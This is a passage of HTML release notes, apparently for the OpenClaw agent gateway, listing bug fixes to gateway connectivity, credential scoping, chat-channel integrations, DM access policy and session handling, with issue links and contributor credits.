href="https://github.com/harshcatsystems-collab">@harshcatsystems-collab</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DJBlackhawk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DJBlackhawk">@DJBlackhawk</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>.</li>
<li>Gateway/startup: return retryable <code>UNAVAILABLE</code> during the sidecar startup window and keep CLI/TUI/status clients retrying inside their existing timeout budget, so early connects no longer surface as terminal handshake failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344421059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73652/hovercard" href="https://github.com/openclaw/openclaw/issues/73652">#73652</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spenceryang1996-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spenceryang1996-dot">@spenceryang1996-dot</a>.</li>
<li>Gateway/proxy: bypass inherited proxy environment for local Gateway control-plane WebSockets to <code>localhost</code> as well as loopback IPs, so Windows/WSL proxy settings cannot intercept local CLI/TUI Gateway connections. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342188777" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73474" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73474/hovercard" href="https://github.com/openclaw/openclaw/pull/73474">#73474</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DhtIsCoding/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DhtIsCoding">@DhtIsCoding</a>.</li>
<li>Doctor/Gateway: use a lightweight <code>status</code> RPC without channel summary work for doctor Gateway liveness, so slow health snapshots do not falsely drive service restart repair. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240455463" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64400/hovercard" href="https://github.com/openclaw/openclaw/issues/64400">#64400</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241956746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64511" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64511/hovercard" href="https://github.com/openclaw/openclaw/pull/64511">#64511</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CHE10X/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CHE10X">@CHE10X</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EronFan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EronFan">@EronFan</a>.</li>
<li>Agents/auth: scope external CLI credential discovery to configured providers during model auth status and startup prewarm, so opencode-only and other single-provider gateways do not block on unrelated Claude CLI Keychain probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347237976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73908/hovercard" href="https://github.com/openclaw/openclaw/issues/73908">#73908</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ailuras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ailuras">@Ailuras</a>.</li>
<li>Agents/model selection: resolve slash-form aliases before provider/model parsing and keep alias-resolved primary models subject to transient provider cooldowns, so cron and persisted sessions do not retry cooled-down raw aliases. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343366616" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73573/hovercard" href="https://github.com/openclaw/openclaw/issues/73573">#73573</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344524821" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73657" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73657/hovercard" href="https://github.com/openclaw/openclaw/issues/73657">#73657</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akai-shuuichi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akai-shuuichi">@akai-shuuichi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashslingers/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashslingers">@hashslingers</a>.</li>
<li>Agents/Claude CLI: reuse already-cached macOS Keychain credentials for no-prompt Claude credential reads, so doctor/runtime checks do not miss fresh interactive Claude auth. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344788745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73682" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73682/hovercard" href="https://github.com/openclaw/openclaw/issues/73682">#73682</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</li>
<li>Agents/Claude CLI doctor: scope workspace and project-dir checks to agents that actually use the Claude CLI runtime, so non-default Claude agents no longer make the default agent look Claude-backed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347196394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73903" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73903/hovercard" href="https://github.com/openclaw/openclaw/issues/73903">#73903</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bobfreeman1989/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bobfreeman1989">@bobfreeman1989</a>.</li>
<li>Gateway/sessions: expose effective agent runtime metadata on session rows, <code>sessions.patch</code>, and local <code>openclaw sessions --json</code>, while keeping Claude CLI-backed rows on the canonical model provider so runtime backend and model identity are no longer conflated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339520660" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73090" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73090/hovercard" href="https://github.com/openclaw/openclaw/issues/73090">#73090</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</li>
<li>Gateway/auth status: scope external CLI credential overlays to configured providers, runtimes, or profiles and keep status reads off new Keychain prompts, so single-provider Gateway configs no longer probe unrelated Claude/Codex/MiniMax auth on startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347237976" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73908" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73908/hovercard" href="https://github.com/openclaw/openclaw/issues/73908">#73908</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ailuras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ailuras">@Ailuras</a>.</li>
<li>Agents/runtime status: expose effective agent runtime metadata in <code>agents.list</code>, Control UI agent panels, and <code>/agents</code>, and avoid rendering stale or cumulative CLI token totals as live context usage. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344570308" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73660" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73660/hovercard" href="https://github.com/openclaw/openclaw/issues/73660">#73660</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343419061" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73578" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73578/hovercard" href="https://github.com/openclaw/openclaw/issues/73578">#73578</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072029751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45268/hovercard" href="https://github.com/openclaw/openclaw/issues/45268">#45268</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spartman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spartman">@spartman</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DashLabsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DashLabsDev">@DashLabsDev</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xyooz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xyooz">@xyooz</a>.</li>
<li>Agents/transcripts: strip empty assistant text blocks while preserving valid text, images, and signatures, so Anthropic-style providers no longer reject sanitized transcript turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344345617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73640" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73640/hovercard" href="https://github.com/openclaw/openclaw/issues/73640">#73640</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jowhee327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jowhee327">@jowhee327</a>.</li>
<li>Gateway/sessions: preserve session keys on hidden lifecycle events so channel-routed runs still persist terminal session state and do not strand session status as running after Codex turn completion. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cathrynlavery/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cathrynlavery">@cathrynlavery</a>.</li>
<li>Providers/Bedrock: omit deprecated <code>temperature</code> for Claude Opus 4.7 Bedrock model ids, named and application inference profiles, including dotted <code>opus-4.7</code> refs, and classify the nested validation response for failover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344649937" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73663" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73663/hovercard" href="https://github.com/openclaw/openclaw/issues/73663">#73663</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>.</li>
<li>Gateway: raise the preauth/connect-challenge timeout to 15s so cold CLI starts on slower hosts have more time to process the WebSocket challenge before the Gateway closes the connection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111642035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51469" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51469/hovercard" href="https://github.com/openclaw/openclaw/issues/51469">#51469</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213272898" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62060" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62060/hovercard" href="https://github.com/openclaw/openclaw/pull/62060">#62060</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GothicFox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GothicFox">@GothicFox</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackychen-png/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackychen-png">@jackychen-png</a>.</li>
<li>CLI/status: fall back to a bounded local <code>status</code> RPC when loopback detail probes time out or report unknown capability, so reachable local gateways are no longer marked unreachable by slow read diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342797952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73535" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73535/hovercard" href="https://github.com/openclaw/openclaw/issues/73535">#73535</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4083597939" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48360/hovercard" href="https://github.com/openclaw/openclaw/issues/48360">#48360</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221198235" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62762" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62762/hovercard" href="https://github.com/openclaw/openclaw/issues/62762">#62762</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110811160" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51357/hovercard" href="https://github.com/openclaw/openclaw/issues/51357">#51357</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4050661491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42019" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42019/hovercard" href="https://github.com/openclaw/openclaw/issues/42019">#42019</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RacecarGuy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RacecarGuy">@RacecarGuy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/justinschille/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/justinschille">@justinschille</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DJBlackhawk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DJBlackhawk">@DJBlackhawk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tianyaqpzm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tianyaqpzm">@tianyaqpzm</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xrsydn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xrsydn">@0xrsydn</a>.</li>
<li>CLI/gateway: reuse cached paired-device auth during <code>gateway probe</code> and report post-connect diagnostic failures as degraded reachability, so healthy local gateways are no longer marked unreachable after loopback auth or read timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4083597939" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48360/hovercard" href="https://github.com/openclaw/openclaw/issues/48360">#48360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RacecarGuy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RacecarGuy">@RacecarGuy</a>.</li>
<li>Channels/Discord: give Discord Gateway WebSocket handshakes a 30s timeout so stalled TLS/network transitions emit an error and Carbon can continue its reconnect loop instead of leaving the bot silent until restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4097993139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50046" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50046/hovercard" href="https://github.com/openclaw/openclaw/pull/50046">#50046</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Mattermost/WebSocket: send protocol ping/pong keepalives and terminate stale sessions when pongs stop arriving, so silent TCP drops reconnect instead of leaving monitoring idle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4049689741" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41837" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41837/hovercard" href="https://github.com/openclaw/openclaw/issues/41837">#41837</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4169293678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57621/hovercard" href="https://github.com/openclaw/openclaw/pull/57621">#57621</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098800956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50138/hovercard" href="https://github.com/openclaw/openclaw/issues/50138">#50138</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065388815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44160" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44160/hovercard" href="https://github.com/openclaw/openclaw/issues/44160">#44160</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108428334" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51104" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51104/hovercard" href="https://github.com/openclaw/openclaw/issues/51104">#51104</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JasonWang1124/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JasonWang1124">@JasonWang1124</a>.</li>
<li>Channels/Telegram: suppress standalone failed edit/write warning payloads when a user-facing assistant error reply already covers the turn, while keeping unresolved mutating failures visible behind success-looking or suppressed-error replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040841536" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39631" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39631/hovercard" href="https://github.com/openclaw/openclaw/issues/39631">#39631</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345454858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73750" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73750/hovercard" href="https://github.com/openclaw/openclaw/pull/73750">#73750</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040858007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39636" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39636/hovercard" href="https://github.com/openclaw/openclaw/pull/39636">#39636</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041006323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39717" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39717/hovercard" href="https://github.com/openclaw/openclaw/pull/39717">#39717</a>; leaves <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040278873" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39406" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39406/hovercard" href="https://github.com/openclaw/openclaw/issues/39406">#39406</a> for configurable delivery policy. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bortlesboat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bortlesboat">@Bortlesboat</a>.</li>
<li>Control UI/agents: persist the Set Default action through <code>agents.list[].default</code> instead of writing the unsupported <code>agents.defaultId</code> field, so saved default-agent changes survive config validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250028068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65565" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65565/hovercard" href="https://github.com/openclaw/openclaw/issues/65565">#65565</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333057256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72585" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72585/hovercard" href="https://github.com/openclaw/openclaw/pull/72585">#72585</a>. Thanks @luyao618.</li>
<li>NVIDIA/NIM: persist the <code>NVIDIA_API_KEY</code> provider marker and mark bundled NVIDIA Chat Completions models as string-content compatible, so NIM models load from <code>models.json</code> and OpenAI-compatible subagent calls send plain text content. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338530888" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73013/hovercard" href="https://github.com/openclaw/openclaw/issues/73013">#73013</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098604940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50107" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50107/hovercard" href="https://github.com/openclaw/openclaw/issues/50107">#50107</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338532925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73014/hovercard" href="https://github.com/openclaw/openclaw/issues/73014">#73014</a>. Thanks @bautrey, @iot2edge, @ifearghal, and @futhgar.</li>
<li>Channels/Discord: let text-only configs drop the <code>GuildVoiceStates</code> gateway intent and expose a bounded <code>/gateway/bot</code> metadata timeout with rate-limited fallback logs, reducing idle CPU and warning floods. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345114420" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73709" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73709/hovercard" href="https://github.com/openclaw/openclaw/issues/73709">#73709</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343589386" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73585" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73585/hovercard" href="https://github.com/openclaw/openclaw/issues/73585">#73585</a>. Thanks @sanchezm86 and @trac3r00.</li>
<li>Agents/sessions: mark same-turn <code>sessions_send</code> and A2A reply prompts with an inter-session <code>isUser=false</code> envelope before they reach the model, so foreign session output no longer lands as bare active user text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345004992" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73702" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73702/hovercard" href="https://github.com/openclaw/openclaw/issues/73702">#73702</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343780208" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73595/hovercard" href="https://github.com/openclaw/openclaw/issues/73595">#73595</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344203540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73622" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73622/hovercard" href="https://github.com/openclaw/openclaw/issues/73622">#73622</a>. Thanks @alvelda.</li>
<li>Channels/Telegram: fail closed when account-level public DM settings conflict with a restrictive top-level <code>allowFrom</code>, and require an effective wildcard before <code>dmPolicy="open"</code> behaves as public access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345556370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73756/hovercard" href="https://github.com/openclaw/openclaw/issues/73756">#73756</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>. Thanks @Hilo-Hilo and @xace1825.</li>
<li>Channels/security: move open-DM allowlist semantics into the shared policy helpers and align Discord, Slack, Mattermost, Matrix, Feishu, LINE, IRC, Google Chat, Zalo, Zalo User, QQ Bot, and Synology Chat so <code>dmPolicy="open"</code> is public only with an effective wildcard and otherwise still respects sender allowlists. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345556370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73756/hovercard" href="https://github.com/openclaw/openclaw/issues/73756">#73756</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>. Thanks @Hilo-Hilo and @xace1825.</li>
<li>ACP/tasks: sweep orphaned parent-owned ACP sessions whose task records are gone, preserving bound persistent sessions but clearing unbound stale ACPX metadata so old child sessions cannot silently respawn into chat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Outbound/security: strip known internal runtime scaffolding such as <code>&lt;system-reminder&gt;</code> and <code>&lt;previous_response&gt;</code> at the final channel delivery boundary and keep Discord output on targeted tag stripping, so degraded harness replies cannot leak those tags to users. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343780208" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73595" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73595/hovercard" href="https://github.com/openclaw/openclaw/issues/73595">#73595</a>. Thanks @gabrielexito-stack and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Security/Telegram: load Telegram security adapters in read-only audit/doctor, audit malformed Telegram DM <code>allowFrom</code> entries even when groups are disabled, and keep allowlist DM audits from counting stale pairing-store senders, so public/shared-DM risk checks stay accurate. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344960552" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73698/hovercard" href="https://github.com/openclaw/openclaw/issues/73698">#73698</a>. Thanks @xace1825.</li>
<li>Plugins: remove hidden manifest, provider-owner, bootstrap, and channel metadata caches so plugin installs, manifest edits, and bundled-root changes are visible on the next metadata read while keeping runtime/module loader caches for actual plugin code. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
